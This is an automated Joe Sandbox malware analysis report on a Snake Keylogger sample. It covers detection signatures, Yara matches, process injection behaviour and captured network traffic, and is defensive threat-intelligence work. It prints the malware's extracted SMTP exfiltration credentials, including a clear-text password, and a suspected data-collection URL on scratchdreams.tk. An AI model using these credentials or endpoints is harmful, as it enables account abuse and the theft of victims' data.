Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PT98765445670009.scr.exe

Overview

General Information

Sample name:PT98765445670009.scr.exe
Analysis ID:1416398
MD5:90a34e7d570fa7c219eb5f1f193611ba
SHA1:0d5d3955b04174b8f21c7bdd8d80ff21507e409c
SHA256:301271b7db09d4769df8953807ea16c44578a4c4b92ef50f24da27c144f95522
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PT98765445670009.scr.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\PT98765445670009.scr.exe" MD5: 90A34E7D570FA7C219EB5F1F193611BA)
    • PT98765445670009.scr.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\PT98765445670009.scr.exe" MD5: 90A34E7D570FA7C219EB5F1F193611BA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
  • 0x4ac6b:$x1: In$J$ct0r
00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14808:$a1: get_encryptedPassword
      • 0x14afe:$a2: get_encryptedUsername
      • 0x14614:$a3: get_timePasswordChanged
      • 0x1470f:$a4: get_passwordField
      • 0x1481e:$a5: set_encryptedPassword
      • 0x15e4a:$a7: get_logins
      • 0x15dad:$a10: KeyLoggerEventArgs
      • 0x15a46:$a11: KeyLoggerEventArgsEventHandler
      00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x18104:$x1: $%SMTPDV$
      • 0x18168:$x2: $#TheHashHere%&
      • 0x197eb:$x3: %FTPDV$
      • 0x198df:$x4: $%TelegramDv$
      • 0x15a46:$x5: KeyLoggerEventArgs
      • 0x15dad:$x5: KeyLoggerEventArgs
      • 0x1980f:$m2: Clipboard Logs ID
      • 0x199db:$m2: Screenshot Logs ID
      • 0x19aa7:$m2: keystroke Logs ID
      • 0x199b3:$m4: \SnakeKeylogger\
      Click to see the 14 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PT98765445670009.scr.exe.5500000.6.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0x4ac6b:$x1: In$J$ct0r
      1.2.PT98765445670009.scr.exe.3f93da0.4.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0x48e6b:$x1: In$J$ct0r
      1.2.PT98765445670009.scr.exe.3fe25d0.2.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0x48e6b:$x1: In$J$ct0r
      1.2.PT98765445670009.scr.exe.5500000.6.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0x48e6b:$x1: In$J$ct0r
      1.2.PT98765445670009.scr.exe.4096c60.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 36 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: PT98765445670009.scr.exeAvira: detected
        Found malware configuration
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
        Multi AV Scanner detection for domain / URL
        Source: scratchdreams.tkVirustotal: Detection: 6%Perma Link
        Source: http://scratchdreams.tkVirustotal: Detection: 6%Perma Link
        Source: https://scratchdreams.tkVirustotal: Detection: 13%Perma Link
        Multi AV Scanner detection for submitted file
        Source: PT98765445670009.scr.exeReversingLabs: Detection: 50%
        Source: PT98765445670009.scr.exeVirustotal: Detection: 59%Perma Link
        Machine Learning detection for sample
        Source: PT98765445670009.scr.exeJoe Sandbox ML: detected
        Source: PT98765445670009.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49700 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.7:49714 version: TLS 1.2
        Source: PT98765445670009.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PT98765445670009.scr.exe, 00000001.00000002.1240796896.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 02C3FCD1h2_2_02C3FA10
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 02C3EFDDh2_2_02C3EDF0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 02C3F967h2_2_02C3EDF0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_02C3E310
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052C1011h2_2_052C0D60
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052C15D8h2_2_052C11C0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CCB61h2_2_052CC8B8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052C15D8h2_2_052C1506
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CCFB9h2_2_052CCD10
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CD869h2_2_052CD5C0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CF6D1h2_2_052CF428
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CC709h2_2_052CC460
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052C0751h2_2_052C04A0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CE9C9h2_2_052CE720
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CBA01h2_2_052CB758
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CF279h2_2_052CEFD0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CE119h2_2_052CDE70
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052C0BB1h2_2_052C0900
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CD411h2_2_052CD168
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052C15D8h2_2_052C11B1
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CC2B1h2_2_052CC008
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052C02F1h2_2_052C0040
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CFB29h2_2_052CF880
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CB5A9h2_2_052CB300
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CEE21h2_2_052CEB78
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CBE59h2_2_052CBBB0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CDCC1h2_2_052CDA18
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 052CE571h2_2_052CE2C8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D8945h2_2_069D8608
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_069D36CE
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D6171h2_2_069D5EC8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D58C1h2_2_069D5618
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D5D19h2_2_069D5A70
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_069D33B8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_069D33A8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D6E79h2_2_069D6BD0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D65C9h2_2_069D6320
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D6A21h2_2_069D6778
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D0741h2_2_069D0498
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D7751h2_2_069D74A8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D0B99h2_2_069D08F0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D72FAh2_2_069D7050
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D02E9h2_2_069D0040
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D5441h2_2_069D5198
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D8459h2_2_069D81B0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D7BA9h2_2_069D7900
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D8001h2_2_069D7D58
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 4x nop then jmp 069D0FF1h2_2_069D0D48

        Networking

        barindex
        Yara detected Generic Downloader
        Source: Yara matchFile source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
        Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
        Source: Joe Sandbox ViewIP Address: 104.21.27.85 104.21.27.85
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49700 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
        Source: PT98765445670009.scr.exe, 00000002.00000002.3683807412.000000000113B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro2G
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.165.48.43
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.165.48.43$
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FAE000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.7:49714 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
